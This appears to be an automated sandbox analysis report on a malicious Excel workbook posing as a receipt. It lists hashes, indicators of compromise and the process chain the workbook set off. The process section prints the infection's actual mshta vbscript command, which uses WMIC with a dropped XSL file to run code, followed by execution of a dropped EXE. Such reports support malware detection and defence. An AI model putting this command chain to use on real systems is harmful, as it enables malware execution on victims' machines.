Analysis
- max time kernel: 150s
- max time network: 153s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 02-07-2021 16:00
Static task: static1
Behavioral task: behavioral1
Sample: Reciept 96285898.xlsb
Resource: win7v20210410
General
- Target: Reciept 96285898.xlsb
- Size: 134KB
- MD5: c32e8a076a3dd64e30cd8b5c5a7a2276
- SHA1: 17b52997cf29214e7b06368269879237c09e7706
- SHA256: 709e2a3846cb20034181c4bb090b6d98499955d850970b87d49e3271184e2d8f
- SHA512: d0a9295cdfb26fe2ee61767515ce279f5bc2c5529903875a76a7d3503215a1875c1dc1b177ce7c0031bd6bb2de6ad36ab4722dcf445bdc0e8184783636b44c50
Malware Config
Signatures
-
Processes:
  resource                    yara_rule
  C:\Windows\Temp\zgbqc.exe   cryptone
  C:\Windows\Temp\zgbqc.exe   cryptone
-
Blocklisted process makes network request 12 IoCs
Processes:
  flow  pid   process
  36    3952  WMIC.exe
  38    3952  WMIC.exe
  40    3952  WMIC.exe
  42    3952  WMIC.exe
  44    3952  WMIC.exe
  46    3952  WMIC.exe
  48    3952  WMIC.exe
  50    3952  WMIC.exe
  52    3952  WMIC.exe
  54    3952  WMIC.exe
  55    3952  WMIC.exe
  57    3952  WMIC.exe
-
Executes dropped EXE 1 IoCs
Processes:
  pid   process
  4040  zgbqc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                                              process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                 EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz            EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  EXCEL.EXE
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
  description        ioc                                                          process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS           EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     EXCEL.EXE
-
Modifies system certificate store
Processes:
  description       ioc                                                                                                                   process
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349                 WMIC.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided)  WMIC.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
  pid  process
  568  EXCEL.EXE
-
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
  description                          pid   process
  Token: SeIncreaseQuotaPrivilege      3952  WMIC.exe
  Token: SeSecurityPrivilege           3952  WMIC.exe
  Token: SeTakeOwnershipPrivilege      3952  WMIC.exe
  Token: SeLoadDriverPrivilege         3952  WMIC.exe
  Token: SeSystemProfilePrivilege      3952  WMIC.exe
  Token: SeSystemtimePrivilege         3952  WMIC.exe
  Token: SeProfSingleProcessPrivilege  3952  WMIC.exe
  Token: SeIncBasePriorityPrivilege    3952  WMIC.exe
  Token: SeCreatePagefilePrivilege     3952  WMIC.exe
  Token: SeBackupPrivilege             3952  WMIC.exe
  Token: SeRestorePrivilege            3952  WMIC.exe
  Token: SeShutdownPrivilege           3952  WMIC.exe
  Token: SeDebugPrivilege              3952  WMIC.exe
  Token: SeSystemEnvironmentPrivilege  3952  WMIC.exe
  Token: SeRemoteShutdownPrivilege     3952  WMIC.exe
  Token: SeUndockPrivilege             3952  WMIC.exe
  Token: SeManageVolumePrivilege       3952  WMIC.exe
  Token: 33                            3952  WMIC.exe
  Token: 34                            3952  WMIC.exe
  Token: 35                            3952  WMIC.exe
  Token: 36                            3952  WMIC.exe
  Token: SeIncreaseQuotaPrivilege      3952  WMIC.exe
  Token: SeSecurityPrivilege           3952  WMIC.exe
  Token: SeTakeOwnershipPrivilege      3952  WMIC.exe
  Token: SeLoadDriverPrivilege         3952  WMIC.exe
  Token: SeSystemProfilePrivilege      3952  WMIC.exe
  Token: SeSystemtimePrivilege         3952  WMIC.exe
  Token: SeProfSingleProcessPrivilege  3952  WMIC.exe
  Token: SeIncBasePriorityPrivilege    3952  WMIC.exe
  Token: SeCreatePagefilePrivilege     3952  WMIC.exe
  Token: SeBackupPrivilege             3952  WMIC.exe
  Token: SeRestorePrivilege            3952  WMIC.exe
  Token: SeShutdownPrivilege           3952  WMIC.exe
  Token: SeDebugPrivilege              3952  WMIC.exe
  Token: SeSystemEnvironmentPrivilege  3952  WMIC.exe
  Token: SeRemoteShutdownPrivilege     3952  WMIC.exe
  Token: SeUndockPrivilege             3952  WMIC.exe
  Token: SeManageVolumePrivilege       3952  WMIC.exe
  Token: 33                            3952  WMIC.exe
  Token: 34                            3952  WMIC.exe
  Token: 35                            3952  WMIC.exe
  Token: 36                            3952  WMIC.exe
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
  pid  process
  568  EXCEL.EXE
  568  EXCEL.EXE
-
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
  pid  process
  568  EXCEL.EXE
  568  EXCEL.EXE
  568  EXCEL.EXE
  568  EXCEL.EXE
  568  EXCEL.EXE
  568  EXCEL.EXE
  568  EXCEL.EXE
  568  EXCEL.EXE
  568  EXCEL.EXE
  568  EXCEL.EXE
  568  EXCEL.EXE
  568  EXCEL.EXE
  568  EXCEL.EXE
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
  description                        pid   process    target process
  PID 568 wrote to memory of 996     568   EXCEL.EXE  splwow64.exe
  PID 568 wrote to memory of 996     568   EXCEL.EXE  splwow64.exe
  PID 2856 wrote to memory of 3952   2856  mshta.EXE  WMIC.exe
  PID 2856 wrote to memory of 3952   2856  mshta.EXE  WMIC.exe
  PID 3952 wrote to memory of 4040   3952  WMIC.exe   zgbqc.exe
  PID 3952 wrote to memory of 4040   3952  WMIC.exe   zgbqc.exe
  PID 3952 wrote to memory of 4040   3952  WMIC.exe   zgbqc.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Reciept 96285898.xlsb"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
- \??\c:\windows\system32\mshta.EXE
  Command line: c:\windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\xDoNotSaveChanges.xsl"" & Chr(34)),0:close")
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\wbem\WMIC.exe
    Command line: "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\xDoNotSaveChanges.xsl"
    - Blocklisted process makes network request
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Temp\zgbqc.exe
      Command line: "C:\Windows\Temp\zgbqc.exe"
      - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\xDoNotSaveChanges.xsl
  MD5: 553b4380b0dea3566cb279a965f85629
  SHA1: bae44084888e5bf95c6ec5a4e69d8287083e2c93
  SHA256: 8480d432ab1b8e8b259708908898a45a893562f3cff3ed2388579fbae94825c8
  SHA512: e446648b995fff2bcf5a5cca3b800875b5dadd022dbf2484eb55be6c4e01711cea1c1dbbcdb78b583f3c764f4c35309aadb1d519fe3504fb6193f7647db696c7
- C:\Windows\Temp\zgbqc.exe
  MD5: 1fa2d8db24799c93d9b6aa37e05f5525
  SHA1: a4e79f386e275c345d3098a56c4269a6a8df209f
  SHA256: 073143c5d5589117612c308b01f84c5e5b024878e98b15021ca820458219a568
  SHA512: ae7c8f5519425d5fcb431325b4d6d00e84bb789d3d9f19d8a4a71230e0bd13b99b692b9fb81ad38ba5b1d3e1ae6a5007b31d56358fcc3fcd07026a5586daeed3
- memory/568-122-0x00007FFCABC90000-0x00007FFCACD7E000-memory.dmp (Filesize: 16.9MB)
- memory/568-118-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp (Filesize: 64KB)
- memory/568-121-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp (Filesize: 64KB)
- memory/568-114-0x00007FF6EE2E0000-0x00007FF6F1896000-memory.dmp (Filesize: 53.7MB)
- memory/568-123-0x00007FFCA9D90000-0x00007FFCABC85000-memory.dmp (Filesize: 31.0MB)
- memory/568-117-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp (Filesize: 64KB)
- memory/568-116-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp (Filesize: 64KB)
- memory/568-115-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmp (Filesize: 64KB)
- memory/996-179-0x0000000000000000-mapping.dmp
- memory/3952-180-0x0000000000000000-mapping.dmp
- memory/4040-182-0x0000000000000000-mapping.dmp